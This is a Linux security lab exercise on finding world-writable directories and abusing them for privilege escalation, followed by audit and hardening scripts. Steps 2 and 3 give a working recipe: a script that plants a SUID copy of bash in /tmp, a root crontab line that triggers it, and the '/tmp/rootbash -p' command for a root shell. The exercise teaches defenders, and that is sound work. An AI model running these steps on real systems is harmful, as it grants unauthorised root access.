Exercise 7: Exploiting World-Writable Directories

Feb 7, 2025

Objective: Understand how attackers can exploit world-writable directories to escalate privileges by creating or modifying files, and learn how to secure directory permissions to prevent such attacks.


Scenario: You are tasked with assessing the security of a Linux system. During your investigation, you discover directories with world-writable permissions. These directories can be exploited to create or overwrite files, potentially leading to privilege escalation or unauthorized actions. Your objective is to identify and exploit these directories while implementing preventive measures to secure the system.


Lab Setup

  1. Environment:
    • A Linux system with at least one directory configured with world-writable permissions.
  2. Tools Required:
    • Terminal access to the Linux system.
    • Basic scripting knowledge (e.g., Bash).

Lab Steps

Step 1: Identify World-Writable Directories

Search for directories with world-writable permissions using the find command:

find / -type d -perm -0002 2>/dev/null

-type d: Restrict the search to directories.

-perm -0002: Find directories with the write permission bit set for others.

2>/dev/null: Suppress permission-denied errors.

Analyze the output to locate directories that could be exploited. Examples include:

/tmp

/var/tmp

Application-specific temporary, spool, or script directories.

Note that /tmp and /var/tmp are world-writable by design and normally carry the sticky bit (mode 1777), which stops users from deleting or renaming files they do not own but does not stop them from creating new ones. The dangerous findings are world-writable directories without the sticky bit, and any world-writable directory from which a privileged process or cron job executes or reads files.
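The following script, added here as an example and not part of the original exercise, automates this step: it lists world-writable directories that lack the sticky bit and then cross-references them against the commands in crontab-style files, so that every printed line is a privileged job that executes or reads a path an unprivileged user could create or replace. The function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the original exercise): find world-writable
# directories that lack the sticky bit and cross-reference them with the
# commands in root's crontab files. Function names are this example's own.

# Print every directory under $1 (default /) that is world-writable but not
# sticky. -xdev keeps the search on one filesystem; errors are discarded.
find_unsafe_writable_dirs() {
    local root="${1:-/}"
    find "$root" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null
}

# Read directories on stdin; print every line of the given crontab-style
# files that references a path inside one of them. -F treats the directory
# as a fixed string, -H prefixes the file name. A miss is not an error.
cron_entries_in_dirs() {
    local dir
    while IFS= read -r dir; do
        grep -H -F -- "$dir/" "$@" 2>/dev/null || true
    done
}

# Usage: audit_cron_vs_writable / /etc/crontab /etc/cron.d/*
# Each printed line is a privileged job that executes or reads a path an
# unprivileged user could create or replace. Defaults to /etc/crontab so
# grep never falls back to reading the directory list from stdin.
audit_cron_vs_writable() {
    local root="$1"
    shift
    [ "$#" -gt 0 ] || set -- /etc/crontab
    find_unsafe_writable_dirs "$root" | cron_entries_in_dirs "$@"
}
```

Source the file and run `audit_cron_vs_writable / /etc/crontab /etc/cron.d/*` on the target; a line such as `* * * * * root /opt/app/tmp/cleanup.sh` showing up in the output means root periodically executes a script that anyone can replace.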

Step 2: Exploit a Vulnerable Directory

Choose a world-writable directory from the list, such as /tmp.

Create a malicious script in the directory:

echo '#!/bin/bash' > /tmp/malicious.sh 
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /tmp/malicious.sh 
chmod +x /tmp/malicious.sh

If this script is executed by root, the copy of /bin/bash is owned by root and carries the SUID bit, so any user can later start it and obtain a root shell. Run by an unprivileged user it only produces a harmless copy owned by that user, so the attack depends on getting a privileged process to execute it.

Identify a process or cron job that executes files from the vulnerable directory, for example a root-owned cron job that runs a script stored in /tmp, or a service that reads a configuration file from there.

Step 3: Trigger the Exploit

Modify the cron job or process to execute your malicious script.

echo '* * * * * root /tmp/malicious.sh' >> /etc/crontab

Warning: appending to /etc/crontab requires root, so this line is only a stand-in that makes the lab self-contained; if you could already write it you would not need the exploit. In a real assessment, look for an existing root cron job, systemd timer, or service that already executes or reads a file from the world-writable directory, and create or replace that file. In a sticky directory such as /tmp you can only create files that do not yet exist (you cannot replace another user's file), which is why non-sticky world-writable directories are the more serious finding.

Wait for the script to execute (with the crontab line above, at most one minute).

Verify the result:

/tmp/rootbash -p 

whoami

Expected output: root. The -p flag is required: without it, bash notices that the effective UID differs from the real UID and drops the privilege. If /tmp is mounted with the nosuid option (common on current distributions; check with findmnt -o TARGET,OPTIONS /tmp), the kernel ignores the SUID bit on /tmp/rootbash and the shell stays unprivileged; in that case have the script place the copy on a filesystem mounted without nosuid.

Step 4: Analyze the Exploit

  1. Document how the world-writable directory was exploited, including:
    • Directory permissions.
    • The malicious script.
    • Steps leading to privilege escalation.

Solution

Explanation:

  • World-writable directories allow any user to create or modify files. If these directories are used by privileged processes, attackers can introduce malicious files to execute arbitrary commands.

Prevention:

Audit and Restrict Permissions:

Remove the world-write bit from directories that do not need it:

chmod o-w /path/to/directory

Do not apply this to shared scratch directories such as /tmp and /var/tmp: every user and many services must be able to write there, and removing the bit breaks them. For those, make sure the sticky bit is set so users cannot delete or replace each other's files, and ensure no privileged job executes from them:

chmod 1777 /var/tmp

Use Secure Temporary Directories:

Configure applications to use private, user-specific temporary files or directories (e.g., created with mktemp, or a per-service private /tmp such as systemd's PrivateTmp=yes) instead of fixed, predictable paths in shared directories.

Monitor for Unauthorized Changes:

Use tools like auditd to track changes to sensitive directories.

Principle of Least Privilege:

Limit user access to critical directories and processes.

Harden Cron Jobs and Processes:

Ensure that cron jobs and automated processes do not execute files from world-writable directories.
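The following script, added here as an example and not part of the original exercise, applies the fix that matches a directory's purpose (a shared scratch directory keeps world write but gets the sticky bit; anything else loses world write), prints the matching auditd watch rule, and verifies that no non-sticky world-writable directory remains. The function names are this example's own; the audit rule is printed rather than loaded so the script runs without root.

```shell
#!/usr/bin/env bash
# Added example (not part of the original exercise): apply the fix that
# matches a directory's purpose, emit the matching auditd watch rule, and
# verify that no non-sticky world-writable directory remains. Function
# names are this example's own.

# Predicates on a single directory: world-write bit set / sticky bit set.
is_world_writable() { [ -n "$(find "$1" -maxdepth 0 -perm -0002 2>/dev/null)" ]; }
has_sticky_bit()    { [ -n "$(find "$1" -maxdepth 0 -perm -1000 2>/dev/null)" ]; }

# harden_writable_dir DIR [shared]
# A shared scratch directory (/tmp-style) must stay writable, so it gets the
# sticky bit (mode 1777) instead of losing world write. Anything else loses
# the world-write bit. Prints the auditd rule that logs writes and attribute
# changes in DIR; load it with:
#   auditctl -w DIR -p wa -k world_writable
harden_writable_dir() {
    local dir="$1" shared="${2:-no}"
    if [ "$shared" = "yes" ]; then
        chmod 1777 "$dir"
    else
        chmod o-w "$dir"
    fi
    printf -- '-w %s -p wa -k world_writable\n' "$dir"
}

# Succeeds only when no directory under $1 is world-writable without the
# sticky bit; re-run after hardening, as the Testing section recommends.
verify_hardened() {
    [ -z "$(find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null)" ]
}
```

Collect the printed rules into a file under /etc/audit/rules.d/ (or pass them to auditctl directly) so that any later attempt to drop a file into a hardened directory is logged under the world_writable key; verify_hardened / then gives a pass/fail answer for the re-check in the Testing and Verification section.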


Testing and Verification

  1. Re-run the find command to confirm no critical directories are world-writable.
  2. Test the exploit after securing the directories to ensure it is no longer feasible.
  3. Document all findings and fixes for reporting.

Reflection

This exercise highlights the risks of misconfigured directory permissions and how they can be exploited for privilege escalation. By identifying and exploiting world-writable directories, you’ve gained hands-on experience in securing Linux systems against such vulnerabilities.
